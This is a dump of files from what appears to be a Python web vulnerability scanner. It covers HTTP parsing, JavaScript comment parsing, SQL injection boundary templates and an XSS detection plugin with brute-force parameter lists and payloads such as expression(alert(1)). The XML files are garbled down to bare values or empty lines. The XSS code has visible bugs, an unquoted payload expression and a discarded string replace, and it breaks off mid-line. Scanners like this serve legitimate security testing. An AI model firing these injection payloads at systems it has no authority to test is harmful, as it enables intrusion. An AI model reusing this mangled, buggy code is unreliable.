158 | req_data += k + ': ' + v + '\r\n'
159 | req_data += '\r\n'
160 | if req.body:
161 | req_data += str(req.body)
162 | return req_data
163 |
164 | @staticmethod
165 | def rsp_to_dict(response):
166 | rsp = dict()
167 | rsp["status_code"] = response.status_code
168 | rsp["headers"] = response.headers
169 | rsp["text"] = str(response.text)
170 | rsp['req'] = response.request
171 | return rsp
172 |
173 | @staticmethod
174 | def rsp_to_req_dict(response):
175 | request = response.request
176 | url = request.url
177 | req = dict()
178 | parse_url = urlparse(url)
179 | req["url"] = request.url
180 | req["path"] = parse_url.path
181 | req["params"] = parse_url.params
182 | req["query"] = parse_url.query
183 | req["host"] = parse_url.netloc
184 | req["method"] = request.method
185 | req["path"] = request.path_url
186 | req["http_version"] = http_version_map[response.raw.version]
187 | req["headers"] = request.headers
188 | req["text"] = str(request.body)
189 | req["raw"] = HTTPParser.rsp_to_reqtext(response)
190 | return req
191 |
192 | @staticmethod
193 | def get_res_req_by_url(url):
194 | headers = dict()
195 | headers["User-Agent"] = Utils.get_random_ua()
196 | headers["Connection"] = "close"
197 | try:
198 | response = requests.get(url,headers=headers,timeout=10)
199 | return HTTPParser.rsp_to_dict(response), HTTPParser.rsp_to_req_dict(response)
200 | except:
201 | logger.debug(traceback.format_exc())
202 | return None, None
203 |
--------------------------------------------------------------------------------
/lib/jscontext.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 | # @Time : 2020/4/8 10:13 AM
4 | # @Author : w8ay
5 | # @File : jscontext.py
6 |
7 | import pyjsparser
8 | from pyjsparser import parse
9 |
10 |
11 | class JsParseError(Exception):
12 | """Exception raised for errors in the input.
13 |
14 | Attributes:
15 | expression -- input expression in which the error occurred
16 | message -- explanation of the error
17 | """
18 |
19 | def __init__(self, expression, message):
20 | self.expression = expression
21 | self.message = message
22 |
23 |
24 | WHITE_SPACE = {0x20, 0x09, 0x0B, 0x0C, 0xA0, 0x1680, 0x180E, 0x2000, 0x2001, 0x2002, 0x2003, 0x2004, 0x2005, 0x2006,
25 | 0x2007, 0x2008, 0x2009, 0x200A, 0x202F, 0x205F, 0x3000, 0xFEFF}
26 |
27 | LINE_TERMINATORS = {0x0A, 0x0D, 0x2028, 0x2029}
28 |
29 |
30 | def isLineTerminator(ch):
31 | return ch in LINE_TERMINATORS
32 |
33 |
34 | def isWhiteSpace(ch):
35 | return ch in WHITE_SPACE
36 |
37 |
38 | def skipMultiLineComment(index, length, source):
39 | start = index
40 | while index < length:
41 | ch = ord(source[index])
42 | if isLineTerminator(ch):
43 | if (ch == 0x0D and ord(source[index + 1]) == 0x0A):
44 | index += 1
45 | index += 1
46 | elif ch == 0x2A:
47 | # Block comment ends with '*/'.
48 | if ord(source[index + 1]) == 0x2F:
49 | index += 2
50 | return {
51 | 'type': 'Block',
52 | 'value': source[start:index - 2],
53 | }
54 |
55 | index += 1
56 | else:
57 | index += 1
58 | return None
59 |
60 |
61 | def skipSingleLineComment(offset, index, length, source):
62 | start = index - offset
63 | while index < length:
64 | ch = ord(source[index])
65 | index += 1
66 | if isLineTerminator(ch):
67 | if (ch == 13 and ord(source[index]) == 10):
68 | index += 1
69 | return {
70 | 'type': 'Line',
71 | 'value': source[start + offset:index - 1],
72 | }
73 | return None
74 |
75 |
76 | def getComment(scripts):
77 | '''
78 | 获得JavaScript中注释内容以及注释类型
79 | :param scripts:
80 | :return:
81 | '''
82 | length = len(scripts)
83 | index = 0
84 | start = True
85 | comments = []
86 | while index < length:
87 | ret = None
88 | ch = ord(scripts[index])
89 | if isWhiteSpace(ch):
90 | index += 1
91 | elif isLineTerminator(ch):
92 | index += 1
93 | if (ch == 0x0D and ord(scripts[index]) == 0x0A):
94 | index += 1
95 | start = True
96 | elif (ch == 0x2F): # U+002F is '/'
97 | ch = ord(scripts[index + 1])
98 | if (ch == 0x2F):
99 | index += 2
100 | ret = skipSingleLineComment(2, index, length, scripts)
101 | start = True
102 | elif (ch == 0x2A): # U+002A is '*'
103 | index += 2
104 | ret = skipMultiLineComment(index, length, scripts)
105 | else:
106 | break
107 | elif (start and ch == 0x2D): # U+002D is '-'
108 | # U+003E is '>'
109 | if (ord(scripts[index + 1]) == 0x2D) and (ord(
110 | scripts[index + 2]) == 0x3E):
111 | # '-->' is a single-line comment
112 | index += 3
113 | ret = skipSingleLineComment(3, index, length, scripts)
114 | else:
115 | break
116 | elif (ch == 0x3C): # U+003C is '<'
117 | if scripts[index + 1:index + 4] == '!--':
118 | #
61 |
62 |
63 |
64 |
65 |
66 | 1
67 | 1
68 | 1,2
69 | 2
70 |
71 | AND '[RANDSTR]'='[RANDSTR]'
72 |
73 |
74 |
75 | 1
76 | 1
77 | 1,2
78 | 2
79 | ')
80 | AND ('[RANDSTR]'='[RANDSTR]
81 |
82 |
83 |
84 | 2
85 | 1
86 | 1,2
87 | 2
88 | '))
89 | AND (('[RANDSTR]'='[RANDSTR]
90 |
91 |
92 |
93 | 3
94 | 1
95 | 1,2
96 | 2
97 | ')))
98 | AND ((('[RANDSTR]'='[RANDSTR]
99 |
100 |
101 |
102 | 1
103 | 1
104 | 1,2
105 | 2
106 | '
107 | AND '[RANDSTR]'='[RANDSTR]
108 |
109 |
110 |
111 | 2
112 | 1
113 | 1,2
114 | 3
115 | ')
116 | AND ('[RANDSTR]' LIKE '[RANDSTR]
117 |
118 |
119 |
120 | 3
121 | 1
122 | 1,2
123 | 3
124 | '))
125 | AND (('[RANDSTR]' LIKE '[RANDSTR]
126 |
127 |
128 |
129 | 4
130 | 1
131 | 1,2
132 | 3
133 | ')))
134 | AND ((('[RANDSTR]' LIKE '[RANDSTR]
135 |
136 |
137 |
138 | 2
139 | 1
140 | 1,2
141 | 3
142 | %'
143 | AND '[RANDSTR]%'='[RANDSTR]
144 |
145 |
146 |
147 | 2
148 | 1
149 | 1,2
150 | 3
151 | '
152 | AND '[RANDSTR]' LIKE '[RANDSTR]
153 |
154 |
155 |
156 | 2
157 | 1
158 | 1,2
159 | 4
160 | ")
161 | AND ("[RANDSTR]"="[RANDSTR]
162 |
163 |
164 |
165 | 3
166 | 1
167 | 1,2
168 | 4
169 | "))
170 | AND (("[RANDSTR]"="[RANDSTR]
171 |
172 |
173 |
174 | 4
175 | 1
176 | 1,2
177 | 4
178 | ")))
179 | AND ((("[RANDSTR]"="[RANDSTR]
180 |
181 |
182 |
183 | 2
184 | 1
185 | 1,2
186 | 4
187 | "
188 | AND "[RANDSTR]"="[RANDSTR]
189 |
190 |
191 |
192 | 3
193 | 1
194 | 1,2
195 | 5
196 | ")
197 | AND ("[RANDSTR]" LIKE "[RANDSTR]
198 |
199 |
200 |
201 | 4
202 | 1
203 | 1,2
204 | 5
205 | "))
206 | AND (("[RANDSTR]" LIKE "[RANDSTR]
207 |
208 |
209 |
210 | 5
211 | 1
212 | 1,2
213 | 5
214 | ")))
215 | AND ((("[RANDSTR]" LIKE "[RANDSTR]
216 |
217 |
218 |
219 | 3
220 | 1
221 | 1,2
222 | 5
223 | "
224 | AND "[RANDSTR]" LIKE "[RANDSTR]
225 |
226 |
227 |
228 |
229 | 3
230 | 1
231 | 1,2
232 | 2
233 | '
234 | OR '[RANDSTR1]'='[RANDSTR2]
235 |
236 |
237 |
238 |
239 |
240 | 5
241 | 9
242 | 1,2
243 | 2
244 | ') WHERE [RANDNUM]=[RANDNUM]
245 | [GENERIC_SQL_COMMENT]
246 |
247 |
248 |
249 | 5
250 | 9
251 | 1,2
252 | 2
253 | ") WHERE [RANDNUM]=[RANDNUM]
254 | [GENERIC_SQL_COMMENT]
255 |
256 |
257 |
258 | 4
259 | 9
260 | 1,2
261 | 1
262 | ) WHERE [RANDNUM]=[RANDNUM]
263 | [GENERIC_SQL_COMMENT]
264 |
265 |
266 |
267 | 4
268 | 9
269 | 1,2
270 | 2
271 | ' WHERE [RANDNUM]=[RANDNUM]
272 | [GENERIC_SQL_COMMENT]
273 |
274 |
275 |
276 | 5
277 | 9
278 | 1,2
279 | 4
280 | " WHERE [RANDNUM]=[RANDNUM]
281 | [GENERIC_SQL_COMMENT]
282 |
283 |
284 |
285 | 4
286 | 9
287 | 1,2
288 | 1
289 | WHERE [RANDNUM]=[RANDNUM]
290 | [GENERIC_SQL_COMMENT]
291 |
292 |
293 |
294 | 5
295 | 9
296 | 1
297 | 2
298 | '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
299 | )||'
300 |
301 |
302 |
303 | 5
304 | 9
305 | 1
306 | 2
307 | '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
308 | )||'
309 |
310 |
311 |
312 | 5
313 | 9
314 | 1
315 | 2
316 | '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
317 | )+'
318 |
319 |
320 |
321 | 5
322 | 9
323 | 1
324 | 2
325 | ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
326 | )||
327 |
328 |
329 |
330 | 5
331 | 9
332 | 1
333 | 2
334 | ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
335 | )||
336 |
337 |
338 |
339 | 5
340 | 9
341 | 1
342 | 1
343 | +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
344 | )+
345 |
346 |
347 |
348 | 5
349 | 9
350 | 1
351 | 2
352 | +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
353 | )+
354 |
355 |
356 |
357 |
358 |
359 | 5
360 | 1
361 | 1,2
362 | 2
363 | ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
364 | [GENERIC_SQL_COMMENT]
365 |
366 |
367 |
368 | 5
369 | 1
370 | 1,2
371 | 2
372 | ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
373 | [GENERIC_SQL_COMMENT]
374 |
375 |
376 |
377 | 5
378 | 1
379 | 1,2
380 | 1
381 | )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
382 | [GENERIC_SQL_COMMENT]
383 |
384 |
385 |
386 | 4
387 | 1
388 | 1,2
389 | 2
390 | ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
391 | [GENERIC_SQL_COMMENT]
392 |
393 |
394 |
395 | 5
396 | 1
397 | 1,2
398 | 4
399 | ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
400 | [GENERIC_SQL_COMMENT]
401 |
402 |
403 |
404 | 4
405 | 1
406 | 1,2
407 | 1
408 | ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
409 | [GENERIC_SQL_COMMENT]
410 |
411 |
412 |
413 | 4
414 | 1
415 | 1
416 | 1
417 | ` WHERE [RANDNUM]=[RANDNUM]
418 | [GENERIC_SQL_COMMENT]
419 |
420 |
421 |
422 | 5
423 | 1
424 | 1
425 | 1
426 | `) WHERE [RANDNUM]=[RANDNUM]
427 | [GENERIC_SQL_COMMENT]
428 |
429 |
430 |
431 |
--------------------------------------------------------------------------------
/plugins/general/scripts/sqli/errors.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
--------------------------------------------------------------------------------
/plugins/general/scripts/xss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-03-30 16:12:12
5 | LastEditors: recar
6 | LastEditTime: 2022-04-07 18:09:23
7 | '''
8 |
9 |
10 | from plugins.scan import Base
11 | from lib.utils import Utils
12 | from lib.html_parser import SearchInputInResponse, random_upper
13 | from lib.jscontext import SearchInputInScript
14 | from lib.http_parser import HTTPParser
15 | import json
16 | import copy
17 |
18 | # copy https://github.com/w-digital-scanner/w13scan/blob/master/W13SCAN/scanners/PerFile/xss.py
19 |
20 | '''
21 | ## 位置与payload需要的字符串
22 |
23 | | 属性 | 必选 | 可选 |
24 | | ------------ | --------------------------------------------------- | -------------------------- |
25 | | HTML标签 | <> | |
26 | | HTML属性 | 空格和等于号(=) | 单引号(')和双引号(")是可选 |
27 | | HTML属性值 | 直接有效的Payload或者需要逗号(,) | |
28 | | HTML文本节点 | <> 字符需要转义文本区域 | |
29 | | HTML注释 | <>!字符必须用来转义注释 | |
30 | | Style | <> 需要转义样式 | |
31 | | Style 属性 | <,>,"字符需要转义文本 | |
32 | | Href 属性 | 直接构造payload,或者“需要转义文本 | |
33 | | JS 节点 | <,>需要转义script,其他特殊的字符来闭合JS变量或函数 | |
34 |
35 | 参考 https://mp.weixin.qq.com/s?__biz=MzU2NzcwNTY3Mg==&mid=2247483698&idx=1&sn=9733c6078516c34963a4c0486c6d1872&chksm=fc986815cbefe103975c2e554ef2667b931e14b2d1dcca407af9edbad83ea72f3ac88efd8d22&mpshare=1&scene=1&srcid=&sharer_sharetime=1588849508551&sharer_shareid=19604935512cdb60a84a4a498605fc8d&key=e4739a048b456af8bbf436c6fb2173754f53fcd63e766a439186e0a2433cd084a69e23876cc446623cb005c3c9fed06af918b7b082f604e7a23c136961d5a1e633f4a60b65b241dea730f7c13578ea94&ascene=1&uin=MTM3MzQ3ODE0MA%3D%3D&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=AZ%2F8pd18PHTzKD6ytyi7PPk%3D&pass_ticket=ssxjxDrN0aRCdy2TGXV37%2Bg0cYgtEknB95Y1dXjxGOtpxjCYC6wfPOq5QXvs3lzE
36 | https://brutelogic.com.br/knoxss.html
37 |
38 | '''
39 | # 隐藏参数
40 | # TOP_RISK_GET_PARAMS = {"id", 'action', 'type', 'm', 'callback', 'cb'}
41 | blindParams = [ # common paramtere names to be bruteforced for parameter discovery
42 | 'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file',
43 | 'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email',
44 | 'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input',
45 | 'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid',
46 | 'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid',
47 | 'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width',
48 | 'height', 'add', 'result', 'log', 'demo', 'example', 'message', 'id', 'action', 'type', 'm', 'callback', 'cb']
49 |
50 | '''
51 |
52 | '''
53 |
54 | BLIND_PARAMS = [ # common paramtere names to be bruteforced for parameter discovery
55 | 'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file',
56 | 'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email',
57 | 'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input',
58 | 'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid',
59 | 'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid',
60 | 'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width',
61 | 'height', 'add', 'result', 'log', 'demo', 'example', 'message', 'id', 'action', 'type', 'm', 'callback', 'cb']
62 |
63 | XSS_EVAL_ATTITUDES = ['onbeforeonload', 'onsubmit', 'ondragdrop', 'oncommand', 'onbeforeeditfocus', 'onkeypress',
64 | 'onoverflow', 'ontimeupdate', 'onreset', 'ondragstart', 'onpagehide', 'onunhandledrejection',
65 | 'oncopy',
66 | 'onwaiting', 'onselectstart', 'onplay', 'onpageshow', 'ontoggle', 'oncontextmenu', 'oncanplay',
67 | 'onbeforepaste', 'ongesturestart', 'onafterupdate', 'onsearch', 'onseeking',
68 | 'onanimationiteration',
69 | 'onbroadcast', 'oncellchange', 'onoffline', 'ondraggesture', 'onbeforeprint', 'onactivate',
70 | 'onbeforedeactivate', 'onhelp', 'ondrop', 'onrowenter', 'onpointercancel', 'onabort',
71 | 'onmouseup',
72 | 'onbeforeupdate', 'onchange', 'ondatasetcomplete', 'onanimationend', 'onpointerdown',
73 | 'onlostpointercapture', 'onanimationcancel', 'onreadystatechange', 'ontouchleave',
74 | 'onloadstart',
75 | 'ondrag', 'ontransitioncancel', 'ondragleave', 'onbeforecut', 'onpopuphiding', 'onprogress',
76 | 'ongotpointercapture', 'onfocusout', 'ontouchend', 'onresize', 'ononline', 'onclick',
77 | 'ondataavailable', 'onformchange', 'onredo', 'ondragend', 'onfocusin', 'onundo', 'onrowexit',
78 | 'onstalled', 'oninput', 'onmousewheel', 'onforminput', 'onselect', 'onpointerleave', 'onstop',
79 | 'ontouchenter', 'onsuspend', 'onoverflowchanged', 'onunload', 'onmouseleave',
80 | 'onanimationstart',
81 | 'onstorage', 'onpopstate', 'onmouseout', 'ontransitionrun', 'onauxclick', 'onpointerenter',
82 | 'onkeydown', 'onseeked', 'onemptied', 'onpointerup', 'onpaste', 'ongestureend', 'oninvalid',
83 | 'ondragenter', 'onfinish', 'oncut', 'onhashchange', 'ontouchcancel', 'onbeforeactivate',
84 | 'onafterprint', 'oncanplaythrough', 'onhaschange', 'onscroll', 'onended', 'onloadedmetadata',
85 | 'ontouchmove', 'onmouseover', 'onbeforeunload', 'onloadend', 'ondragover', 'onkeyup',
86 | 'onmessage',
87 | 'onpopuphidden', 'onbeforecopy', 'onclose', 'onvolumechange', 'onpropertychange', 'ondblclick',
88 | 'onmousedown', 'onrowinserted', 'onpopupshowing', 'oncommandupdate', 'onerrorupdate',
89 | 'onpopupshown',
90 | 'ondurationchange', 'onbounce', 'onerror', 'onend', 'onblur', 'onfilterchange', 'onload',
91 | 'onstart',
92 | 'onunderflow', 'ondragexit', 'ontransitionend', 'ondeactivate', 'ontouchstart', 'onpointerout',
93 | 'onpointermove', 'onwheel', 'onpointerover', 'onloadeddata', 'onpause', 'onrepeat',
94 | 'onmouseenter',
95 | 'ondatasetchanged', 'onbegin', 'onmousemove', 'onratechange', 'ongesturechange',
96 | 'onlosecapture',
97 | 'onplaying', 'onfocus', 'onrowsdelete']
98 |
99 | class Scan(Base):
100 | def __init__(self, report_work):
101 | super().__init__(report_work)
102 | self.plugins_name = "xss"
103 |
104 |
105 | def test_echo(self, url_info):
106 | echo_query_list = list()
107 | query_dict = copy.copy(url_info.get("query_dict"))
108 | headers = url_info.get("headers")
109 | method = url_info.get("method")
110 | base_url = url_info.get("base_url")
111 | origin_url = url_info.get("origin_url")
112 | # 混合测试的参数
113 | query_list = list(query_dict.keys())+BLIND_PARAMS
114 | for query in query_list:
115 | query_dict[query] = Utils.gen_random_str()
116 | #url
117 | data = None
118 | if method=="GET":
119 | fix_query_str = ""
120 | for key,value in query_dict.items():
121 | fix_query_str += key + "=" + value+"&"
122 | if fix_query_str.endswith("&"):
123 | fix_query_str = fix_query_str[:-1]
124 | if "?" in origin_url:
125 | origin_query = origin_url.split("?")[-1]
126 | url = origin_url.replace(origin_query, fix_query_str)
127 | else:
128 | # 隐藏参数
129 | finx_query_str = "?"
130 | for query in query_dict:
131 | finx_query_str += query + "=" + query_dict[query][0]+"&"
132 | if finx_query_str.endswith("&"):
133 | finx_query_str = finx_query_str[:-1]
134 | url = origin_url+"?"+finx_query_str
135 | else: # post
136 | url = base_url
137 | if url_info.get("json"):
138 | # 如果是json的
139 | data = json.dumps(query_dict)
140 | else:
141 | # 普通post的
142 | data = ""
143 | for key,value in query_dict.items():
144 | data += key + "=" + value+"&"
145 | if data.endswith("&"):
146 | data = data[:-1]
147 | # 发送请求
148 | response = self.request(url, method=method, data=data, headers=headers, timeout=10)
149 | for key, value in query_dict.items():
150 | if value in response.text:
151 | self.logger.debug("find echo key: {0}".format(key))
152 | locations = SearchInputInResponse( value, response.text)
153 | self.logger.debug("locations: {0}".format(locations))
154 | if locations:
155 | echo_query_list.append({
156 | "key": key,
157 | "value": value,
158 | "locations": locations
159 | })
160 | return echo_query_list
161 |
162 |
163 | def fix_query_get_response(self, url_info, echo_query, payload):
164 | query_dict = url_info.get("query_dict")
165 | headers = url_info.get("headers")
166 | method = url_info.get("method")
167 | base_url = url_info.get("base_url")
168 | origin_url = url_info.get("origin_url")
169 | if echo_query in query_dict.keys():
170 | origin_query = echo_query+"="+query_dict[echo_query][0]
171 | payload_query = echo_query+"="+payload
172 | else:
173 | # 隐藏参数
174 | origin_query = ""
175 | for query in query_dict:
176 | origin_query += query + "=" + query_dict[query][0]+"&"
177 | if origin_query.endswith("&"):
178 | origin_query = origin_query[:-1]
179 | payload_query = origin_query+"&"+echo_query+"="+payload
180 | self.logger.debug("origin_url: {0}".format(origin_url))
181 | self.logger.debug("origin_query: {0}".format(origin_query))
182 | self.logger.debug("payload_query: {0}".format(payload_query))
183 | #url
184 | if method=="GET":
185 | url = origin_url.replace(origin_query, payload_query)
186 | self.logger.debug("url: {0}".format(url))
187 | else: # post
188 | url = base_url
189 | if url_info.get("json"):
190 | # 如果是json的
191 | query_dict[echo_query] = payload
192 | data = json.dumps(query_dict)
193 | else:
194 | # 普通post的
195 | data.replace(origin_query, payload_query)
196 | return self.request(url, method=method, headers=headers)
197 |
198 | def verify(self, url_info, req, rsp, violent=False):
199 | '''
200 | xss 检测
201 |
202 | '''
203 | echo_query_list = self.test_echo(url_info)
204 | if len(echo_query_list)==0:
205 | return
206 | for echo_query_info in echo_query_list:
207 | locations = echo_query_info.get('locations')
208 | echo_query = echo_query_info.get("key")
209 | xsschecker = echo_query_info.get('value')
210 | if not locations:
211 | continue
212 | for item in locations:
213 | _type = item["type"]
214 | details = item["details"]
215 | if _type == "html":
216 | if details["tagname"] == "style":
217 | payload = "expression(a({}))".format(Utils.gen_random_str())
218 | response = self.fix_query_get_response(url_info, echo_query, payload)
219 | _locations = SearchInputInResponse(payload, response.text)
220 | for _item in _locations:
221 | if payload in _item["details"]["content"] and _item["details"]["tagname"] == "style":
222 | result = {
223 | "plugins": self.plugins_name,
224 | "url": url_info.get("origin_url"),
225 | "req": HTTPParser.rsp_to_reqtext(response),
226 | "payload": echo_query+"="+expression(alert(1)),
227 | "desc": "可能存在xss E下可执行的表达式 expression(alert(1))"
228 | }
229 | self.print_result(result)
230 | self.to_result(result)
231 | break
232 | flag = Utils.gen_random_str(7)
233 | payload = "{}><{}>".format(random_upper(details["tagname"]), flag)
234 | truepayload = "{}>{}".format(random_upper(details["tagname"]), "